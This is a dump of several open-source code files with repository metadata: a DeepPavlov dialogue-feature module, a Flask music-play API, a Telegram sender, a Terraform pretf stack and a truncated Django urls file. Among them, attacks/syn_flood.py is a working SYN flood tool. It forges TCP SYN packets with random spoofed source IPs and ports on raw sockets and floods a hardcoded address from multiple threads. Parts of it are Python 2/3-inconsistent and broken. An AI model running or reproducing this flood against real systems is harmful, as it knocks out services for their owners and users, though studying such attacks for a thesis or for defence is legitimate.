] | 5,893 | 2018-02-01T18:13:20.000Z | 2022-03-31T19:22:21.000Z | deeppavlov/models/go_bot/dto/dataset_features.py | xbodx/DeepPavlov | 4b60bf162df4294b8b0db3b72786cdd699c674fa | [
"Apache-2.0"
] | 749 | 2018-01-31T11:36:02.000Z | 2022-03-30T07:24:22.000Z | deeppavlov/models/go_bot/dto/dataset_features.py | xbodx/DeepPavlov | 4b60bf162df4294b8b0db3b72786cdd699c674fa | [
"Apache-2.0"
] | 1,155 | 2018-02-01T10:52:15.000Z | 2022-03-29T02:12:15.000Z | from typing import List
import numpy as np
# todo remove boilerplate duplications
# todo comments
# todo logging
# todo naming
from deeppavlov.models.go_bot.nlu.dto.nlu_response import NLUResponse
from deeppavlov.models.go_bot.policy.dto.digitized_policy_features import DigitizedPolicyFeatures
from deeppavlov.models.go_bot.tracker.dto.dst_knowledge import DSTKnowledge
from copy import deepcopy
class UtteranceFeatures:
"""
the DTO-like class storing the training features of a single utterance of a dialog
(to feed the GO-bot policy model)
"""
action_mask: np.ndarray
attn_key: np.ndarray
tokens_embeddings_padded: np.ndarray
features: np.ndarray
def __init__(self,
nlu_response: NLUResponse,
tracker_knowledge: DSTKnowledge,
features: DigitizedPolicyFeatures):
self.action_mask = features.action_mask
self.attn_key = features.attn_key
tokens_vectorized = nlu_response.tokens_vectorized # todo proper oop
self.tokens_embeddings_padded = tokens_vectorized.tokens_embeddings_padded
self.features = features.concat_feats
class UtteranceTarget:
"""
the DTO-like class storing the training target of a single utterance of a dialog
(to feed the GO-bot policy model)
"""
action_id: int
def __init__(self, action_id):
self.action_id = action_id
class UtteranceDataEntry:
"""
the DTO-like class storing both the training features and target
of a single utterance of a dialog (to feed the GO-bot policy model)
"""
features: UtteranceFeatures
target: UtteranceTarget
def __init__(self, features, target):
self.features = features
self.target = target
@staticmethod
def from_features_and_target(features: UtteranceFeatures, target: UtteranceTarget):
return UtteranceDataEntry(deepcopy(features), deepcopy(target))
@staticmethod
def from_features(features: UtteranceFeatures):
return UtteranceDataEntry(deepcopy(features), UtteranceTarget(None))
class DialogueFeatures:
"""
    the DTO-like class storing the training features
of a dialog (to feed the GO-bot policy model)
"""
action_masks: List[np.ndarray]
attn_keys: List[np.ndarray]
tokens_embeddings_paddeds: List[np.ndarray]
featuress: List[np.ndarray]
def __init__(self):
self.action_masks = []
self.attn_keys = []
self.tokens_embeddings_paddeds = []
self.featuress = []
def append(self, utterance_features: UtteranceFeatures):
self.action_masks.append(utterance_features.action_mask)
self.attn_keys.append(utterance_features.attn_key)
self.tokens_embeddings_paddeds.append(utterance_features.tokens_embeddings_padded)
self.featuress.append(utterance_features.features)
def __len__(self):
return len(self.featuress)
class DialogueTargets:
"""
    the DTO-like class storing the training targets
of a dialog (to feed the GO-bot policy model)
"""
action_ids: List[int]
def __init__(self):
self.action_ids = []
def append(self, utterance_target: UtteranceTarget):
self.action_ids.append(utterance_target.action_id)
def __len__(self):
return len(self.action_ids)
class DialogueDataEntry:
"""
the DTO-like class storing both the training features and targets
of a dialog (to feed the GO-bot policy model)
"""
features: DialogueFeatures
targets: DialogueTargets
def __init__(self):
self.features = DialogueFeatures()
self.targets = DialogueTargets()
def append(self, utterance_features: UtteranceDataEntry):
self.features.append(utterance_features.features)
self.targets.append(utterance_features.target)
def __len__(self):
return len(self.features)
class PaddedDialogueFeatures(DialogueFeatures):
"""
    the DTO-like class storing the **padded to some specified length** training features
of a dialog (to feed the GO-bot policy model)
"""
padded_dialogue_length_mask: List[int]
def __init__(self, dialogue_features: DialogueFeatures, sequence_length):
super().__init__()
padding_length = sequence_length - len(dialogue_features)
self.padded_dialogue_length_mask = [1] * len(dialogue_features) + [0] * padding_length
self.action_masks = dialogue_features.action_masks + \
[np.zeros_like(dialogue_features.action_masks[0])] * padding_length
self.attn_keys = dialogue_features.attn_keys + [np.zeros_like(dialogue_features.attn_keys[0])] * padding_length
self.tokens_embeddings_paddeds = dialogue_features.tokens_embeddings_paddeds + \
[np.zeros_like(
dialogue_features.tokens_embeddings_paddeds[0])] * padding_length
self.featuress = dialogue_features.featuress + [np.zeros_like(dialogue_features.featuress[0])] * padding_length
class PaddedDialogueTargets(DialogueTargets):
"""
    the DTO-like class storing the **padded to some specified length** training targets
of a dialog (to feed the GO-bot policy model)
"""
def __init__(self, dialogue_targets: DialogueTargets, sequence_length):
super().__init__()
padding_length = sequence_length - len(dialogue_targets)
self.action_ids = dialogue_targets.action_ids + [0] * padding_length
class PaddedDialogueDataEntry(DialogueDataEntry):
"""
the DTO-like class storing both the **padded to some specified length** training features and targets
of a dialog (to feed the GO-bot policy model)
"""
features: PaddedDialogueFeatures
targets: PaddedDialogueTargets
def __init__(self, dialogue_data_entry: DialogueDataEntry, sequence_length):
super().__init__()
self.features = PaddedDialogueFeatures(dialogue_data_entry.features, sequence_length)
self.targets = PaddedDialogueTargets(dialogue_data_entry.targets, sequence_length)
class BatchDialoguesFeatures:
"""
    the DTO-like class storing the training features
of a batch of dialogues. (to feed the GO-bot policy model)
"""
b_action_masks: List[List[np.ndarray]]
b_attn_keys: List[List[np.ndarray]]
b_tokens_embeddings_paddeds: List[List[np.ndarray]]
b_featuress: List[List[np.ndarray]]
b_padded_dialogue_length_mask: List[List[int]]
max_dialogue_length: int
def __init__(self, max_dialogue_length):
self.b_action_masks = []
self.b_attn_keys = []
self.b_tokens_embeddings_paddeds = []
self.b_featuress = []
self.b_padded_dialogue_length_mask = []
self.max_dialogue_length = max_dialogue_length
def append(self, padded_dialogue_features: PaddedDialogueFeatures):
self.b_action_masks.append(padded_dialogue_features.action_masks)
self.b_attn_keys.append(padded_dialogue_features.attn_keys)
self.b_tokens_embeddings_paddeds.append(padded_dialogue_features.tokens_embeddings_paddeds)
self.b_featuress.append(padded_dialogue_features.featuress)
self.b_padded_dialogue_length_mask.append(padded_dialogue_features.padded_dialogue_length_mask)
def __len__(self):
return len(self.b_featuress)
class BatchDialoguesTargets:
"""
    the DTO-like class storing the training targets
of a batch of dialogues. (to feed the GO-bot policy model)
"""
b_action_ids: List[List[int]]
max_dialogue_length: int
def __init__(self, max_dialogue_length):
self.b_action_ids = []
self.max_dialogue_length = max_dialogue_length
def append(self, padded_dialogue_targets: PaddedDialogueTargets):
self.b_action_ids.append(padded_dialogue_targets.action_ids)
def __len__(self):
return len(self.b_action_ids)
class BatchDialoguesDataset:
"""
the DTO-like class storing both the training features and target
of a batch of dialogues. (to feed the GO-bot policy model)
Handles the dialogues padding.
"""
features: BatchDialoguesFeatures
targets: BatchDialoguesTargets
def __init__(self, max_dialogue_length):
self.features = BatchDialoguesFeatures(max_dialogue_length)
self.targets = BatchDialoguesTargets(max_dialogue_length)
self.max_dialogue_length = max_dialogue_length
def append(self, dialogue_features: DialogueDataEntry):
padded_dialogue_features = PaddedDialogueDataEntry(dialogue_features, self.max_dialogue_length)
self.features.append(padded_dialogue_features.features)
self.targets.append(padded_dialogue_features.targets)
def __len__(self):
return len(self.features)
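The padding scheme used by `PaddedDialogueFeatures`/`PaddedDialogueTargets` above — a 1/0 length mask plus a zero-filled tail up to `sequence_length` — can be sketched without the deeppavlov classes; plain lists stand in for the numpy feature arrays, and `pad_dialogue` is a hypothetical helper name:

```python
def pad_dialogue(features, sequence_length, pad_value=0):
    # 1 marks a real utterance, 0 marks padding; the feature list is
    # extended with pad_value entries up to sequence_length.
    padding_length = sequence_length - len(features)
    mask = [1] * len(features) + [0] * padding_length
    padded = features + [pad_value] * padding_length
    return padded, mask

padded, mask = pad_dialogue([5, 7, 9], 5)
```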
| 34.100386 | 119 | 0.718637 | 1,048 | 8,832 | 5.757634 | 0.101145 | 0.058336 | 0.039443 | 0.029831 | 0.482764 | 0.361949 | 0.334935 | 0.275936 | 0.260027 | 0.260027 | 0 | 0.000997 | 0.205389 | 8,832 | 258 | 120 | 34.232558 | 0.858792 | 0.177423 | 0 | 0.169014 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007752 | 0 | 1 | 0.183099 | false | 0 | 0.042254 | 0.056338 | 0.556338 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
bb5c048667a0292288c7bd98af21da085db5a478 | 8,880 | py | Python | app/ws.py | javi-cortes/music_ws | 7ca60e481f16d71ee6d3ff61e112ba12e9c7db8f | [
"MIT"
] | null | null | null | app/ws.py | javi-cortes/music_ws | 7ca60e481f16d71ee6d3ff61e112ba12e9c7db8f | [
"MIT"
] | null | null | null | app/ws.py | javi-cortes/music_ws | 7ca60e481f16d71ee6d3ff61e112ba12e9c7db8f | [
"MIT"
] | null | null | null | import json
from datetime import timedelta
import dateutil.parser
from flask import Blueprint, request
from app.models.main import Channel, Performer, Song, Play
# Response codes
CODE_KO = 1
CODE_OK = 0
music_ws = Blueprint('music_ws', __name__)
@music_ws.route('/', methods=['GET'])
def index():
return 'Hello this is dog "/"'
def build_response(result, code, errors=None):
r = {'result': result, 'code': code}
if errors:
r['errors'] = errors
return json.dumps(r)
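Every handler in this module funnels its reply through this envelope; a self-contained usage sketch (the function body is repeated here so the snippet runs on its own, and the example values are made up):

```python
import json

def build_response(result, code, errors=None):
    # Same envelope as the module above: result + code,
    # with an errors list only when one is supplied.
    r = {'result': result, 'code': code}
    if errors:
        r['errors'] = errors
    return json.dumps(r)

ok = build_response("Channel 'bbc1' added/updated", 0)
ko = build_response("", 1, errors=['Channel name not provided'])
```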
# INGESTION
@music_ws.route('/add_channel', methods=['POST'])
def add_channel():
channel = request.values.get('name', '')
r = {'result': "", 'code': CODE_KO}
if channel:
Channel.objects(name=channel).update_one(upsert=True, name=channel)
r['result'] = "Channel '%s' added/updated" % channel
r['code'] = CODE_OK
if not channel:
r['errors'] = ['Channel name not provided']
return build_response(**r)
@music_ws.route('/add_performer', methods=['POST'])
def add_performer():
performer = request.values.get('name', '')
r = {'result': "", 'code': CODE_KO}
if performer:
Performer.objects(name=performer).update_one(upsert=True, name=performer)
r['result'] = "Performer '%s' added/updated" % performer
r['code'] = CODE_OK
if not performer:
r['errors'] = ['Performer name not provided']
return build_response(**r)
@music_ws.route('/add_song', methods=['POST'])
def add_song():
title = request.values.get('title', '')
performer = request.values.get('performer', '')
r = {'result': "", 'code': CODE_KO}
if title and performer:
Song.objects(title=title, performer=performer).update_one(upsert=True, title=title, performer=performer)
r['result'] = "Song '%s' by '%s' added/updated" % (title, performer)
r['code'] = CODE_OK
if not (title and performer):
r['errors'] = ['Title or performer not provided']
return build_response(**r)
@music_ws.route('/add_play', methods=['POST'])
def add_play():
title = request.values.get('title', '')
performer = request.values.get('performer', 'unknown-performer')
start = request.values.get('start', '')
end = request.values.get('end', '')
channel = request.values.get('channel', '')
r = {'result': "", 'code': CODE_KO, 'errors': []}
necessary_data = all([title, performer, start, end, channel])
if necessary_data:
dates_parsed = _parse_date_helper([start, end])
if dates_parsed:
parsed_start, parsed_end = dates_parsed
play_data = dict(title=title, performer=performer, start=parsed_start, end=parsed_end, channel=channel)
Play.objects(**play_data).update_one(upsert=True, **play_data)
r['result'] = "Play '%s' added/updated" % (", ".join(["%s: %s" % (k, v) for k, v in play_data.items()]))
r['code'] = CODE_OK
else:
r['errors'].append("Invalid date format, please provide dates in UTC ISO 8601")
if not necessary_data:
r['errors'].append('Title, Performer, Start, End or Channel not provided')
return build_response(**r)
# REQUEST
@music_ws.route('/get_song_plays', methods=['GET'])
def get_song_plays():
title = request.values.get('title', '')
performer = request.values.get('performer', '')
start = request.values.get('start', '')
end = request.values.get('end', '')
r = {'result': [], 'code': CODE_KO, 'errors': []}
necessary_data = all([title, performer, start, end])
if necessary_data:
dates_parsed = _parse_date_helper([start, end])
if dates_parsed:
parsed_start, parsed_end = dates_parsed
plays = Play.objects(start__gte=parsed_start, end__lte=parsed_end, title=title, performer=performer)
r['result'] = prepare_song_plays(plays)
r['code'] = CODE_OK
else:
r['errors'].append("Invalid date format, please provide dates in UTC ISO 8601")
if not necessary_data:
r['errors'].append('Title, Performer, Start or End not provided')
return build_response(**r)
@music_ws.route('/get_channel_plays', methods=['GET'])
def get_channel_plays():
channel = request.values.get('channel', '')
start = request.values.get('start', '')
end = request.values.get('end', '')
r = {'result': [], 'code': CODE_KO, 'errors': []}
necessary_data = all([channel, start, end])
if necessary_data:
dates_parsed = _parse_date_helper([start, end])
if dates_parsed:
parsed_start, parsed_end = dates_parsed
plays = Play.objects(start__gte=parsed_start, end__lte=parsed_end, channel=channel)
r['result'] = prepare_channel_plays(plays)
r['code'] = CODE_OK
else:
r['errors'].append("Invalid date format, please provide dates in UTC ISO 8601")
if not necessary_data:
r['errors'].append('Title, Performer, Start or End not provided')
return build_response(**r)
@music_ws.route('/get_top', methods=['GET'])
def get_top():
channels = json.loads(request.values.get('channels', '{}'))
start = request.values.get('start', '')
r = {'result': [], 'code': CODE_KO, 'errors': []}
try:
limit = int(request.values.get('limit', 0))
    except (TypeError, ValueError):
r['errors'].append("Invalid limit, provide a valid integer")
return build_response(**r)
start_parsed = _parse_date_helper(start)
if not start_parsed:
r['errors'].append("Invalid date format, please provide dates in UTC ISO 8601")
return build_response(**r)
    # From the given date, subtract its weekday index to get the Monday that
    # starts its week; the week then ends six days later.
start_week = start_parsed[0] - timedelta(days=start_parsed[0].weekday())
end_week = start_week + timedelta(days=6)
# calculate current week
top_plays = get_top_aggregate(channels, start_week, end_week, limit)
# calculate past week
# TODO : this query should be cached or pre-calculated in another structure.
lastweek_start = start_week - timedelta(days=7)
lastweek_end = lastweek_start + timedelta(days=6)
top_plays_lastweek = get_top_aggregate(channels, lastweek_start, lastweek_end, limit)
r['result'] = prepare_top_plays(top_plays, top_plays_lastweek)
r['code'] = CODE_OK
return build_response(**r)
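The week arithmetic used by `get_top` above (a Monday-anchored window around the given date, then the same window shifted back seven days) can be checked in isolation; `week_window` is a hypothetical helper name:

```python
from datetime import datetime, timedelta

def week_window(d):
    # Monday of d's week through the following Sunday, mirroring the
    # start_week/end_week computation in get_top.
    start = d - timedelta(days=d.weekday())
    return start, start + timedelta(days=6)

start_week, end_week = week_window(datetime(2017, 6, 14))  # a Wednesday
lastweek_start = start_week - timedelta(days=7)
lastweek_end = lastweek_start + timedelta(days=6)
```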
# Helpers
def _parse_date_helper(dates):
    """
    Date helper to parse dates in UTC ISO 8601 format.
    Accepts a single date string or a list of them; returns a list of
    parsed datetimes, or an empty list if any date fails to parse.
    """
    dates = [dates] if type(dates) is not list else dates
    try:
        # Return a real list (not a lazy map object) so callers can test
        # truthiness and index into the result on Python 3.
        return [dateutil.parser.parse(d) for d in dates]
    except (TypeError, ValueError, OverflowError):
        return []
# TODO : prepare_song_plays and prepare_channel_plays could be more generic.
def prepare_song_plays(plays):
_plays = []
for plays in plays:
_plays.append({
'channel': plays.channel,
'start': plays.start.isoformat(),
'end': plays.end.isoformat()
})
return _plays
def prepare_channel_plays(plays):
_plays = []
for plays in plays:
_plays.append({
'performer': plays.performer,
'title': plays.title,
'start': plays.start.isoformat(),
'end': plays.end.isoformat()
})
return _plays
def prepare_top_plays(plays, lastweek_plays):
"""
Join current plays with last week.
TODO : This is a temporary process, all top plays should be summarized and stored in the DB.
"""
for rank, p in enumerate(plays):
p['previous_plays'] = 0 # default value
p['previous_rank'] = None # default value
p['rank'] = rank
for rank_lastweek, lp in enumerate(lastweek_plays):
if p['title'] == lp['title'] and p['performer'] == lp['performer']:
# that guy was in the last week, push up his data to plays list.
p['previous_plays'] = lp['plays']
p['previous_rank'] = rank_lastweek
return plays
def get_top_aggregate(channels, start_week, end_week, limit):
plays = Play._get_collection().aggregate([
{
"$match": {
"channel": {"$in": channels},
"start": {"$gte": start_week},
"end": {"$lte": end_week}
}
},
{
"$group": {
"_id": {
"performer": "$performer",
"title": "$title"
},
"plays": {"$sum": 1}
}
},
{
"$project": {
"_id": 0,
"performer": "$_id.performer",
"title": "$_id.title",
"plays": 1
}
},
{"$sort": {"plays": -1}},
{"$limit": limit}
])
return list(plays) | 31.714286 | 117 | 0.601689 | 1,091 | 8,880 | 4.726856 | 0.156737 | 0.047896 | 0.058949 | 0.034904 | 0.470235 | 0.420981 | 0.390149 | 0.380454 | 0.380454 | 0.347489 | 0 | 0.004981 | 0.253941 | 8,880 | 280 | 118 | 31.714286 | 0.773434 | 0.072635 | 0 | 0.38191 | 0 | 0 | 0.170747 | 0 | 0 | 0 | 0 | 0.010714 | 0 | 1 | 0.070352 | false | 0 | 0.025126 | 0.005025 | 0.180905 | 0.01005 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
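For reference, the `$match`/`$group`/`$sort`/`$limit` pipeline above maps onto this pure-Python equivalent over plain dicts; `top_plays` is a hypothetical name, and integers stand in for the datetime window:

```python
from collections import Counter

def top_plays(plays, channels, start_week, end_week, limit):
    # Count plays per (performer, title) inside the channel/date window,
    # then emit the most-played entries first, capped at `limit`.
    counts = Counter(
        (p["performer"], p["title"])
        for p in plays
        if p["channel"] in channels
        and p["start"] >= start_week
        and p["end"] <= end_week
    )
    return [
        {"performer": performer, "title": title, "plays": n}
        for (performer, title), n in counts.most_common(limit)
    ]

sample = [
    {"channel": "a", "performer": "X", "title": "t1", "start": 1, "end": 2},
    {"channel": "a", "performer": "X", "title": "t1", "start": 3, "end": 4},
    {"channel": "a", "performer": "Y", "title": "t2", "start": 1, "end": 2},
    {"channel": "b", "performer": "Z", "title": "t3", "start": 1, "end": 2},
]
top = top_plays(sample, ["a"], 0, 10, 2)
```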
246f42b9ab1dca2ee51900cb7e5757551282b861 | 635 | py | Python | src/senders/telegram_sender.py | maticardenas/football_api_notif | 81f9e265d4effb7545e3d9ad80ee1109cd9b8edf | [
"MIT"
] | null | null | null | src/senders/telegram_sender.py | maticardenas/football_api_notif | 81f9e265d4effb7545e3d9ad80ee1109cd9b8edf | [
"MIT"
] | null | null | null | src/senders/telegram_sender.py | maticardenas/football_api_notif | 81f9e265d4effb7545e3d9ad80ee1109cd9b8edf | [
"MIT"
] | null | null | null | from config.notif_config import NotifConfig
from src.api.telegram_client import TelegramClient
def send_telegram_message(
chat_id: str, message: str = "", photo: str = "", video: str = ""
) -> None:
telegram_client = TelegramClient(NotifConfig.TELEGRAM_TOKEN)
if photo:
response = telegram_client.send_photo(chat_id, photo_url=photo, text=message)
elif video:
response = telegram_client.send_video(chat_id, video_url=video, text=message)
else:
response = telegram_client.send_message(chat_id, message)
print(f"TELEGRAM MESSAGE SENT RESPONSE: {response.status_code}\n{response.text}")
| 37.352941 | 85 | 0.733858 | 82 | 635 | 5.45122 | 0.390244 | 0.1566 | 0.147651 | 0.174497 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.165354 | 635 | 16 | 86 | 39.6875 | 0.843396 | 0 | 0 | 0 | 0 | 0 | 0.111811 | 0.061417 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.153846 | 0 | 0.230769 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
24747539fd8ac22a7c135fadd0de950c9f614794 | 1,060 | py | Python | examples/asg-only/stack.tf.py | steve-stonehouse/terraform-aws-asg-pipeline | 281a857a232cabb58cfaf6a302a96b1a27781cd6 | [
"MIT"
] | 1 | 2021-02-20T10:36:40.000Z | 2021-02-20T10:36:40.000Z | examples/asg-only/stack.tf.py | steve-stonehouse/terraform-aws-asg-pipeline | 281a857a232cabb58cfaf6a302a96b1a27781cd6 | [
"MIT"
] | 1 | 2021-05-13T13:58:13.000Z | 2021-05-13T13:58:13.000Z | examples/asg-only/stack.tf.py | steve-stonehouse/terraform-aws-asg-pipeline | 281a857a232cabb58cfaf6a302a96b1a27781cd6 | [
"MIT"
] | 4 | 2021-01-07T10:10:44.000Z | 2021-10-15T21:16:35.000Z | """
This file is used by Pretf to generate stack.tf.json.
The reason for using Pretf is that our AWS profiles have MFA prompts,
which is not supported by Terraform. We're using multiple AWS profiles
in these examples to manage resources in multiple AWS accounts, so we
can't use simple environment variables for AWS credentials. Pretf solves
this and also manages the S3 backend resources.
"""
from pretf.api import block
from pretf.aws import provider_aws, terraform_backend_s3
def pretf_blocks(var):
    yield block("variable", "aws_region", {"default": "eu-west-1"})
    yield block("variable", "aws_version", {"default": "3.1.0"})
    yield block("variable", "terraform_version", {"default": "0.12.26"})
    yield terraform_backend_s3(
        bucket="terraform-aws-asg-codepipeline-tfstate",
        dynamodb_table="terraform-aws-asg-codepipeline-tfstate",
        key="asg-only.tfstate",
        profile="claranetuk-thirdplaygroundRW",
        region=var.aws_region,
    )
    yield block("terraform", {"required_version": var.terraform_version})
| 35.333333 | 73 | 0.726415 | 148 | 1,060 | 5.114865 | 0.547297 | 0.05284 | 0.071334 | 0.055482 | 0.089828 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013544 | 0.164151 | 1,060 | 29 | 74 | 36.551724 | 0.840858 | 0.364151 | 0 | 0 | 1 | 0 | 0.374436 | 0.156391 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.142857 | 0 | 0.214286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
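The stack.tf.py record above follows pretf's pattern of a generator that yields configuration blocks which are then merged into a `stack.tf.json` file. A minimal sketch of that "yield blocks, merge to JSON" idea — the helper names below are illustrative stand-ins, not pretf's real API:

```python
import json

def pretf_style_blocks():
    # Each yielded dict is one top-level Terraform JSON block.
    yield {"variable": {"aws_region": {"default": "eu-west-1"}}}
    yield {"variable": {"terraform_version": {"default": "0.12.26"}}}
    yield {"terraform": {"required_version": "0.12.26"}}

def render_tf_json(block_iter):
    """Merge yielded blocks by top-level key and render Terraform JSON."""
    out = {}
    for blk in block_iter:
        for key, body in blk.items():
            out.setdefault(key, {}).update(body)
    return json.dumps(out, indent=2)
```

Merging by top-level key means several `variable` blocks collapse into one `variable` object, which matches Terraform's JSON syntax.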
24777626ecc3432512182ddd00d3df2a0858c543 | 5,070 | py | Python | code/attacks/syn_flood.py | LTKills/TCC-Course-Conclusion-Thesis | 9f0f9f7796020e7d49d0b2e0ab76e20692e5f3a4 | [
"MIT"
] | null | null | null | code/attacks/syn_flood.py | LTKills/TCC-Course-Conclusion-Thesis | 9f0f9f7796020e7d49d0b2e0ab76e20692e5f3a4 | [
"MIT"
] | null | null | null | code/attacks/syn_flood.py | LTKills/TCC-Course-Conclusion-Thesis | 9f0f9f7796020e7d49d0b2e0ab76e20692e5f3a4 | [
"MIT"
] | null | null | null | # Developed by GABRIEL PEREIRA PINHEIRO and VICTOR ARAUJO VIEIRA
# In the University of Brasilia on 2017
# Attack: SYN flood
#All copyrights to Gabriel Pereira Pinheiro and Victor Araujo Vieira
import socket, sys, random
from struct import *
from threading import Thread
import time
flag_encerra_threads = False
# checksum function needed for checksum calculation
def checksum(msg):
s = 0
# loop taking 2 characters at a time
for i in range(0, len(msg), 2):
w = (ord(msg[i]) << 8) + (ord(msg[i+1]) )
s = s + w
s = (s>>16) + (s & 0xffff);
#s = s + (s >> 16);
#complement and mask to 4 byte short
s = ~s & 0xffff
return s
def menu():
x = input('Digite o numero de threads que serao ativadas ')
return x
def show_begin(ip_dest):
import time
print ('Iniciando o ataque ao roteador', ip_dest)
time.sleep(3)
def show_who(ip,numero):
print(' O servidor ',ip,'esta sendo atacado pela thread ',numero)
def attack(numero_thread, dest_ip):
#create a raw socket
#import time
try:
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)
except socket.error as msg:
print('Socket could not be created. Error Code : ' + str(msg[0]) + ' Message ' + msg[1])
sys.exit()
# tell kernel not to put in headers, since we are providing it
s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
# now start constructing the packet
packet = '';
#atacando proprio roteador
#gera um ip de origem aleatorio, mas com os intervalos sempre de 2 a 254
#para evitar que sejam todos 255 ou tenha 0.0.0.0
#source_ip = '.'.join('%s'%random.randint(2, 254) for i in range(4))
#source_ip = '192...'
#dest_ip = '192...'
#show_who(dest_ip,numero_thread)
# ip header fields
ihl = 5
version = 4
tos = 0
tot_len = 20 + 20 # python seems to correctly fill the total length, dont know how ??
id = 30 #Id of this packet
frag_off = 0
ttl = 255
protocol = socket.IPPROTO_TCP
check = 10 # python seems to correctly fill the checksum
daddr = socket.inet_aton ( dest_ip )
ihl_version = (version << 4) + ihl
# tcp header fields
dest = 80 # destination port
seq = 0
ack_seq = 0
doff = 5 #4 bit field, size of tcp header, 5 * 4 = 20 bytes
#tcp flags
fin = 0
syn = 1 #Setando a flag syn do pacote tcp
rst = 0
psh = 0
ack = 0
urg = 0
window = 5000
check = 0
urg_ptr = 0
offset_res = (doff << 4) + 0
tcp_flags = fin + (syn << 1) + (rst << 2) + (psh <<3) + (ack << 4) + (urg << 5)
dest_address = socket.inet_aton(dest_ip)
placeholder = 0
protocol = socket.IPPROTO_TCP
while not flag_encerra_threads:
source_ip = '.'.join('%s'%random.randint(2, 254) for i in range(4))
print('source ip: ' + source_ip)
saddr = socket.inet_aton ( source_ip )
# the ! in the pack format string means network order
ip_header = pack('!BBHHHBBH4s4s' , ihl_version, tos, tot_len, id, frag_off, ttl, protocol, check, saddr, daddr)
#parte de gerar o pacote TCP, para cada nova porta gerada
source = random.randint(4000, 9000) # gera portas de origem aleatorias, entre os intervalos 4000 e 9000
# the ! in the pack format string means network order
tcp_header = pack('!HHLLBBHHH' , source, dest, seq, ack_seq, offset_res, tcp_flags, window, check, urg_ptr)
# pseudo header fields
source_address = socket.inet_aton( source_ip )
tcp_length = len(tcp_header)
psh = pack('!4s4sBBH' , source_address , dest_address , placeholder , protocol , tcp_length);
psh = psh + tcp_header;
tcp_checksum = checksum(psh)
# make the tcp header again and fill the correct checksum
tcp_header = pack('!HHLLBBHHH' , source, dest, seq, ack_seq, offset_res, tcp_flags, window, tcp_checksum , urg_ptr)
# final full packet - syn packets dont have any data
packet = ip_header + tcp_header
s.sendto(packet, (dest_ip , 0 )) # put this in a loop if you want to flood the target
#contador = contador + 1
s.close() # encerra o socket
def count_time(max):
import time
begin = time.time()
duration = 0
while True:
time_until_now = time.time()
duration = time_until_now - begin
if duration > max:
print('\n\nSe passaram ',duration,' segundos\n\n')
begin = time.time()
ataque = []
def main():
global flag_encerra_threads  # needed so the assignment below reaches the attack threads
qnt = menu()
# Put here the IP address you want to attack
dest_ip = '192.168.15.17'  # IP to attack
for i in range(0, qnt):
ataque.append(Thread(target = attack, args = [i, dest_ip]))
show_begin(dest_ip)
for i in range (0, qnt):
ataque[i].setDaemon(True)
ataque[i].start()
while True:
time.sleep(40)
resp = raw_input('Deseja encerrar o ataque(0 ou 1)? ')
if(resp == '1'):
flag_encerra_threads = True
break
main()
| 28.644068 | 124 | 0.619132 | 745 | 5,070 | 4.107383 | 0.358389 | 0.017647 | 0.009804 | 0.017974 | 0.188235 | 0.156863 | 0.137909 | 0.096078 | 0.096078 | 0.069281 | 0 | 0.036672 | 0.27929 | 5,070 | 176 | 125 | 28.806818 | 0.800766 | 0.293294 | 0 | 0.107843 | 0 | 0 | 0.085311 | 0 | 0 | 0 | 0.00339 | 0.005682 | 0 | 0 | null | null | 0.009804 | 0.058824 | null | null | 0.04902 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
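The `checksum()` routine in the record above is Python 2-only (it calls `ord()` on string bytes) and would raise `IndexError` on odd-length input. A Python 3 sketch of the same RFC 1071 ones'-complement sum, with odd-length padding handled:

```python
def inet_checksum(data: bytes) -> int:
    """RFC 1071 ones'-complement checksum over 16-bit big-endian words."""
    if len(data) % 2:
        data += b'\x00'          # pad odd-length input with a zero byte
    total = 0
    for i in range(0, len(data), 2):
        total += (data[i] << 8) + data[i + 1]
    # fold any carries above 16 bits back into the low 16 bits
    while total >> 16:
        total = (total & 0xffff) + (total >> 16)
    return ~total & 0xffff       # ones' complement of the folded sum
```

In Python 3, indexing `bytes` already yields integers, so no `ord()` is needed.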
2478ca648fedf246d69a5e00ab4529cc5ae395e3 | 282 | py | Python | shop/urls.py | ArRosid/ECommerceAPI | f683eed52e3591f6f45b955fb14f34154fa434ca | [
"MIT"
] | null | null | null | shop/urls.py | ArRosid/ECommerceAPI | f683eed52e3591f6f45b955fb14f34154fa434ca | [
"MIT"
] | null | null | null | shop/urls.py | ArRosid/ECommerceAPI | f683eed52e3591f6f45b955fb14f34154fa434ca | [
"MIT"
] | 1 | 2022-02-16T08:21:39.000Z | 2022-02-16T08:21:39.000Z | from django.urls import path, include
from rest_framework import routers
